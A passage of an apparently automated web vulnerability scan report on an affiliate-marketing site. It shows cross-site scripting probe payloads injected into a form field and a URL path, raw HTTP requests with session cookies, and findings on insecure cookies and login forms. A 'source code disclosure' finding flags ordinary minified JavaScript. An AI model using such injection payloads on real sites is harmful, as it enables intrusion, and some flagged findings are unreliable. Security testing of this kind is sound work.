VigLink provides <strong>comprehensive, real-time reports</strong> that
give you insight into what your visitors do both on your site and after
they leave. See which links are driving the most traffic from your site to
other places across the web, which links have made you the most money,
what products you've helped to sell through affiliated merchants, and much
more.
</p>

<p>
Dig through your stats in our dashboard, or download the raw data to slice
and dice with your favorite reporting tools.
</p>
</div>
</div>

<div>
<div class="column span-7">
<h3>Setup is free and easy</h3>

<p>
Just <strong>paste a few lines of HTML</strong> into your site. That's it.
Link to other sites the same way you always have. With VigLink there
aren't any special link codes for you to remember. We'll automatically add
them when visitors click a link to leave your site.
</p>
</div>

<div class="column span-5">
<img src="/public/images/features/snippet.png" width="345" height="114" alt="HTML snippet"/>
</div>
</div>

<div id="subfooter">
<ul>
<li>
Have you lost relationships with merchants because your state has passed
tax laws for online retail? We may be able to help, find out more
<a href="http://blog.viglink.com/2010/03/31/helping-affiliates-caught-in-the-tax-debate/">on our blog</a>.
</li>
<li>
We have a
<a href="http://blog.viglink.com/2010/05/11/refer-a-publisher-earn-10-percent/">referral
program</a>! Refer a new publisher and receive 10% of the commissions they
earn for one year.
</li>
<li>
Wondering whether we support affiliation for a specific merchant? Members
can <a href="/tools/coverage">search the list</a>. If you do find one we
don't support, check again soon. The list is growing every day.
</li>
</ul>
</div>

<div>
<div id="signup" class="column span-50p">
<a href="/users/signup" class="default button">Sign up today</a>
</div>

<div id="presales" class="column span-50p">
<h4>Not quite ready?</h4>

<p>
You don't have to sign up to see how VigLink could work for you. We'll
analyze your site and prepare a report detailing which kinds of links
your site already includes, and which could be earning you money with
VigLink.
</p>

<form action="/users/action/presales" method="post">
<label for="email">Email:</label>
<input id="email" name="email" size="30" type="text" value="" placeholder="you@example.com"/>
<label for="domain">Web Site:</label>
<input id="domain" name="domain" size="30" type="text" value="'"--></style></script><script>netsparker(0x000504)</script>" placeholder="example.com"/>
<button type="submit">Generate Report</button>
</form>
</div>
</div>
<p>
Still got questions? Get <a href="/support">answers</a>, or see a
<a href="/demo">demo</a>.
</p>
</div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li class=" selected"><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
- /users/signup/%22ns=%22alert(0x00027D)

/users/signup/%22ns=%22alert(0x00027D)

https://www.viglink.com/users/signup/%22ns=%22alert(0x00027D)

Parameters

Parameter Type Value
URI-BASED Raw URI /"ns="alert(0x00027D)

Request

GET /users/signup/%22ns=%22netsparker(0x00027D) HTTP/1.1
Referer: https://www.viglink.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: JSESSIONID=9FEAAF14BE476CBAB8F29AE706205425; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:51:53 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=DE8EBEC7DD11C2F8FD2427D908075B51; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2203
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Sign Up</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? '.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h123230883.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul></div></div><div id="body"> <ul class="navigation"> <li class=" selected"><span class="step">1</span>Sign Up</li><li><span class="step">2</span>Verify Your Account</li></ul><h2>Sign Up</h2><form action="/users/action/signup" method="post" id="signup-email-form"> <input type="hidden" name="merchantKey" value=""ns="netsparker(0x00027D)"/> <label for="email">Email:</label> <input id="email" name="email" size="30" type="text" value="" placeholder="you@example.com"/> <button type="submit">Join Free</button> <ul class="actions"> <li>Already have an account? <a href="/users/login">Log in</a></li> </ul></form><script type="text/javascript"> if( ! $('#flash').length && location.search.match( /[?&]dr=/i ) ) { $(document).ready( function() { flash.news( '<h4>Driving Revenue is now part of VigLink!</h4> Find out more on the\ <a href="http://blog.viglink.com/2010/08/02/viglink-acquires-driving-revenue/">\ VigLink blog</a>. Sign up now to get all of the benefits of\ Driving Revenue with VigLink.' ); $('#flash').addClass('dr'); } ); }</script></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.245.213.194) --></body></html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /users/

/users/ CONFIRMED

https://www.viglink.com/users/

Identified Cookie

vglnk.Agent.p

Request

GET /users/ HTTP/1.1
Referer: https://www.viglink.com/users/action/login
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=ed34bf95ecb748028d32495101e192fd; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/
Location: https://www.viglink.com/users/login?_ek=tl&ar=%2Fusers%2F
Content-Length: 0
Connection: close
Content-Type: text/plain


Critical Form Served Over HTTP

Critical Form Served Over HTTP

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified that a password field is served over HTTP.

Impact

If an attacker can carry out a MITM (Man in the middle) attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing action of the HTTP code to steal the users password. Even though the target page is HTTPS, this does not protect the system against MITM attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /users/login

/users/login CONFIRMED

http://www.viglink.com/users/login

Form target action

https://www.viglink.com/users/action/login

Request

GET /users/login HTTP/1.1
Referer: http://www.viglink.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: JSESSIONID=D362476B98CE83D56B106BB82E005557; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Encoding:
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Mon, 18 Apr 2011 23:50:52 GMT
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1959
Connection: keep-alive


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Sign In</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? '.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul></div></div><div id="body"> <div class="column span-8"> <h2>Log In</h2> <form action="https://www.viglink.com/users/action/login" method="post"> <input type="hidden" name="authRedirect" value=""/> <label for="email">Email:</label> <input id="email" name="email" size="30" type="text" value="" placeholder="you@example.com"/> <label for="password">Password:</label> <input id="password" name="password" size="30" type="password"/> <button type="submit">Log In</button> <ul class="actions"> <li><a href="/users/send-verification">I forgot my password</a></li> <li>Need an account? <a href="/users/signup">Sign up</a></li> </ul> </form></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
[Possible] PHP Source Code Disclosure

[Possible] PHP Source Code Disclosure

2 TOTAL
MEDIUM
Netsparker identified a web page that discloses PHP (server side) source code. An attacker can obtain server side source code of web application, which can contain sensitive data such as database connection strings, usernames and passwords along with the technical and business logic of the application.

Impact

Depending on the source code, database connection strings, username and passwords, internal workings and business logic of application can be revealed. With such information an attacker can mount the following types of attacks:
  • Access the database or other data resources. Depending on the privileges of the account obtained from source code, it may be possible to read, update or delete arbitrary data from the database.
  • Gain access to password protected administrative mechanisms such as dashboards, management consoles and admin panels, hence gaining full control of the application.
  • Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.

Actions to Take

  1. Where the file is not required delete it form the server, where such files are required ensure that its permissions prevent users from accessing it via the web server.
  2. Ensure that the web server security patches are up to date and the latest stable version of the web server software is in use.
  3. Remove all temporary and backup files from the server.

Required skills for successful exploitation

This is dependent on the information obtained from source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application reside on.

External References

- /combined.js.h898114336.pack

/combined.js.h898114336.pack

http://www.viglink.com/combined.js.h898114336.pack

Request

GET /combined.js.h898114336.pack HTTP/1.1
Referer: http://www.viglink.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: JSESSIONID=CEF7843FA8178E6F5D0D7AB172BA439B; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Encoding:
Content-Type: text/javascript;charset=utf-8
Date: Mon, 18 Apr 2011 23:50:51 GMT
ETag: pack898114336
Expires: Thu, 15 Apr 2021 23:50:51 GMT
X-Powered-By: pack:tag
transfer-encoding: chunked
Connection: keep-alive


(function(f,o){function t(){if(!b.isReady){try{A.documentElement.doScroll("left")}catch(a){setTimeout(t,1);return}b.ready()}}function k(a,c){c.src?b.ajax({url:c.src,async:false,dataType:"script"}):b.globalEval(c.text||c.textContent||c.innerHTML||"");c.parentNode&&c.parentNode.removeChild(c)}function h(a,c,d,g,e,m){var n=a.length;if(typeof c==="object"){for(var C in c)h(a,C,c[C],g,e,d);return a}if(d!==o){g=!m&&g&&b.isFunction(d);for(C=0;C<n;C++)e(a[C],c,g?d.call(a[C],C,e(a[C],c)):d,m);return a}return n?e(a[0],c):o}function l(){return(new Date).getTime()}function u(){return false}function J(){return true}function B(a,c,d){d[0].type=a;return b.event.handle.apply(c,d)}function r(a){var c,d=[],g=[],e=arguments,m,n,C,x,E,L;n=b.data(this,"events");if(!(a.liveFired===this||!n||!n.live||a.button&&a.type==="click")){a.liveFired=this;var Y=n.live.slice(0);for(x=0;x<Y.length;x++){n=Y[x];n.origType.replace(H,"")===a.type?g.push(n.selector):Y.splice(x--,1)}m=b(a.target).closest(g,a.currentTarget);E=0;for(L=m.length;E<L;E++)for(x=0;x<Y.length;x++){n=Y[x];if(m[E].selector===n.selector){C=m[E].elem;g=null;if(n.preType==="mouseenter"||n.preType==="mouseleave")g=b(a.relatedTarget).closest(n.selector)[0];if(!g||g!==C)d.push({elem:C,handleObj:n})}}E=0;for(L=d.length;E<L;E++){m=d[E];a.currentTarget=m.elem;a.data=m.handleObj.data;a.handleObj=m.handleObj;if(m.handleObj.origHandler.apply(m.elem,e)===false){c=false;break}}return c}}function P(a,c){return"live."+(a&&a!=="*"?a+".":"")+c.replace(/\./g,"`").replace(/ /g,"&")}function M(a,c){var d=0;c.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var g=b.data(a[d++]),e=b.data(this,g);if(g=g&&g.events){delete e.handle;e.events={};for(var m in g)for(var n in g[m])b.event.add(this,m,g[m][n],g[m][n].data)}}})}function i(a,c,d){var g,e,m;c=c&&c[0]?c[0].ownerDocument||c[0]:A;if(a.length===1&&typeof a[0]==="string"&&a[0].length<512&&c===A&&!Ra.test(a[0])&&(b.support.checkClone||!Sa.test(a[0]))){e=true;if(m=b.fragments[a[0]])if(m!==1)g=m}if(!g){g=c.createDocumentFragment();b.clean(a,c,g,d)}if(e)b.fragments[a[0]]=m?g:1;return{fragment:g,cacheable:e}}function q(a,c){var d={};b.each(Ta.concat.apply([],Ta.slice(0,c)),function(){d[this]=a});return d}function s(a){return"scrollTo"in a&&a.document?a:a.nodeType===9?a.defaultView||a.parentWindow:false}var b=function(a,c){return new b.fn.init(a,c)},D=f.jQuery,I=f.$,A=f.document,K,V=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,R=/^.[^:#\[\.,]*$/,ga=/\S/,oa=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,ra=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,ka=navigator.userAgent,O=false,N=[],Q,w=Object.prototype.toString,T=Object.prototype.hasOwnProperty,la=Array.prototype.push,ba=Array.prototype.slice,ea=Array.prototype.indexOf;b.fn=b.prototype={init:function(a,c){var d,g,e;if(!a)return this;if(a.nodeType){this.context=this[0]=a;this.length=1;return this}if(a==="body"&&!c){this.context=A;this[0]=A.body;this.selector="body";this.length=1;return this}if(typeof a==="string")if((d=V.exec(a))&&(d[1]||!c))if(d[1]){e=c?c.ownerDocument||c:A;if(g=ra.exec(a))if(b.isPlainObject(c)){a=[A.createElement(g[1])];b.fn.attr.call(a,c,true)}else a=[e.createElement(g[1])];else{g=i([d[1]],[e]);a=(g.cacheable?g.fragment.cloneNode(true):g.fragment).childNodes}return b.merge(this,a)}else{if(g=A.getElementById(d[2])){if(g.id!==d[2])return K.find(a);this.length=1;this[0]=g}this.context=A;this.selector=a;return this}else if(!c&&/^\w+$/.test(a)){this.selector=a;this.context=A;a=A.getElementsByTagName(a);return b.merge(this,a)}else return!c||c.jquery?(c||K).find(a):b(c).find(a);else if(b.isFunction(a))return K.ready(a);if(a.selector!==o){this.selector=a.selector;this.context=a.context}return b.makeArray(a,this)},selector:"",jquery:"1.4.2",length:0,size:function(){return this.length},toArray:function(){return ba.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this.slice(a)[0]:this[a]},pushStack:function(a,c,d){var g=b();b.isArray(a)?la.apply(g,a):b.merge(g,a);g.prevObject=this;g.context=this.context;if(c==="find")g.selector=this.selector+(this.selector?" ":"")+d;else if(c)g.selector=this.selector+"."+c+"("+d+")";return g},each:function(a,c){return b.each(this,a,c)},ready:function(a){b.bindReady();if(b.isReady)a.call(A,b);else N&&N.push(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(ba.apply(this,arguments),"slice",ba.call(arguments).join(","))},map:function(a){return this.pushStack(b.map(this,function(c,d){return a.call(c,d,c)}))},end:function(){return this.prevObject||b(null)},push:la,sort:[].sort,splice:[].splice};b.fn.init.prototype=b.fn;b.extend=b.fn.extend=function(){var a=arguments[0]||{},c=1,d=arguments.length,g=false,e,m,n,C;if(typeof a==="boolean"){g=a;a=arguments[1]||{};c=2}if(typeof a!=="object"&&!b.isFunction(a))a={};if(d===c){a=this;--c}for(;c<d;c++)if((e=arguments[c])!=null)for(m in e){n=a[m];C=e[m];if(a!==C)if(g&&C&&(b.isPlainObject(C)||b.isArray(C))){n=n&&(b.isPlainObject(n)||b.isArray(n))?n:b.isArray(C)?[]:{};a[m]=b.extend(g,n,C)}else if(C!==o)a[m]=C}return a};b.extend({noConflict:function(a){f.$=I;if(a)f.jQuery=D;return b},isReady:false,ready:function(){if(!b.isReady){if(!A.body)return setTimeout(b.ready,13);b.isReady=true;if(N){for(var a,c=0;a=N[c++];)a.call(A,b);N=null}b.fn.triggerHandler&&b(A).triggerHandler("ready")}},bindReady:function(){if(!O){O=true;if(A.readyState==="complete")return b.ready();if(A.addEventListener){A.addEventListener("DOMContentLoaded",Q,false);f.addEventListener("load",b.ready,false)}else if(A.attachEvent){A.attachEvent("onreadystatechange",Q);f.attachEvent("onload",b.ready);var a=false;try{a=f.frameElement==null}catch(c){}A.documentElement.doScroll&&a&&t()}}},isFunction:function(a){return w.call(a)==="[object Function]"},isArray:function(a){return w.call(a)==="[object Array]"},isPlainObject:function(a){if(!a||w.call(a)!=="[object Object]"||a.nodeType||a.setInterval)return false;if(a.constructor&&!T.call(a,"constructor")&&!T.call(a.constructor.prototype,"isPrototypeOf"))return false;for(var c in a);return c===o||T.call(a,c)},isEmptyObject:function(a){for(var c in a)return false;return true},error:function(a){throw a;},parseJSON:function(a){if(typeof a!=="string"||!a)return null;a=b.trim(a);if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,"")))return f.JSON&&f.JSON.parse?f.JSON.parse(a):(new Function("return "+a))();else b.error("Invalid JSON: "+a)},noop:function(){},globalEval:function(a){if(a&&ga.test(a)){var c=A.getElementsByTagName("head")[0]||A.documentElement,d=A.createElement("script");d.type="text/javascript";if(b.support.scriptEval)d.appendChild(A.createTextNode(a));else d.text=a;c.insertBefore(d,c.firstChild);c.removeChild(d)}},nodeName:function(a,c){return a.nodeName&&a.nodeName.toUpperCase()===c.toUpperCase()},each:function(a,c,d){var g,e=0,m=a.length,n=m===o||b.isFunction(a);if(d)if(n)for(g in a){if(c.apply(a[g],d)===false)break}else for(;e<m;){if(c.apply(a[e++],d)===false)break}else if(n)for(g in a){if(c.call(a[g],g,a[g])===false)break}else for(d=a[0];e<m&&c.call(d,e,d)!==false;d=a[++e]);return a},trim:function(a){return(a||"").replace(oa,"")},makeArray:function(a,c){var d=c||[];if(a!=null)a.length==null||typeof a==="string"||b.isFunction(a)||typeof a!=="function"&&a.setInterval?la.call(d,a):b.merge(d,a);return d},inArray:function(a,c){if(c.indexOf)return c.indexOf(a);for(var d=0,g=c.length;d<g;d++)if(c[d]===a)return d;return-1},merge:function(a,c){var d=a.length,g=0;if(typeof c.length==="number")for(var e=c.length;g<e;g++)a[d++]=c[g];else for(;c[g]!==o;)a[d++]=c[g++];a.length=d;return a},grep:function(a,c,d){for(var g=[],e=0,m=a.length;e<m;e++)!d!==!c(a[e],e)&&g.push(a[e]);return g},map:function(a,c,d){for(var g=[],e,m=0,n=a.length;m<n;m++){e=c(a[m],m,d);if(e!=null)g[g.length]=e}return g.concat.apply([],g)},guid:1,proxy:function(a,c,d){if(arguments.length===2)if(typeof c==="string"){d=a;a=d[c];c=o}else if(c&&!b.isFunction(c)){d=c;c=o}if(!c&&a)c=function(){return a.apply(d||this,arguments)};if(a)c.guid=a.guid=a.guid||c.guid||b.guid++;return c},uaMatch:function(a){a=a.toLowerCase();a=/(webkit)[ \/]([\w.]+)/.exec(a)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(a)||/(msie) ([\w.]+)/.exec(a)||!/compatible/.test(a)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(a)||[];return{browser:a[1]||"",version:a[2]||"0"}},browser:{}});ka=b.uaMatch(ka);if(ka.browser){b.browser[ka.browser]=true;b.browser.version=ka.version}if(b.browser.webkit)b.browser.safari=true;if(ea)b.inArray=function(a,c){return ea.call(c,a)};K=b(A);if(A.addEventListener)Q=function(){A.removeEventListener("DOMContentLoaded",Q,false);b.ready()};else if(A.attachEvent)Q=function(){if(A.readyState==="complete"){A.detachEvent("onreadystatechange",Q);b.ready()}};(function(){b.support={};var a=A.documentElement,c=A.createElement("script"),d=A.createElement("div"),g="script"+l();d.style.display="none";d.innerHTML=" <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";var e=d.getElementsByTagName("*"),m=d.getElementsByTagName("a")[0];if(!(!e||!e.length||!m)){b.support={leadingWhitespace:d.firstChild.nodeType===3,tbody:!d.getElementsByTagName("tbody").length,htmlSerialize:!!d.getElementsByTagName("link").length,style:/red/.test(m.getAttribute("style")),hrefNormalized:m.getAttribute("href")==="/a",opacity:/^0.55$/.test(m.style.opacity),cssFloat:!!m.style.cssFloat,checkOn:d.getElementsByTagName("input")[0].value==="on",optSelected:A.createElement("select").appendChild(A.createElement("option")).selected,parentNode:d.removeChild(d.appendChild(A.createElement("div"))).parentNode===null,deleteExpando:true,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};c.type="text/javascript";try{c.appendChild(A.createTextNode("window."+g+"=1;"))}catch(n){}a.insertBefore(c,a.firstChild);if(f[g]){b.support.scriptEval=true;delete f[g]}try{delete c.test}catch(C){b.support.deleteExpando=false}a.removeChild(c);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function 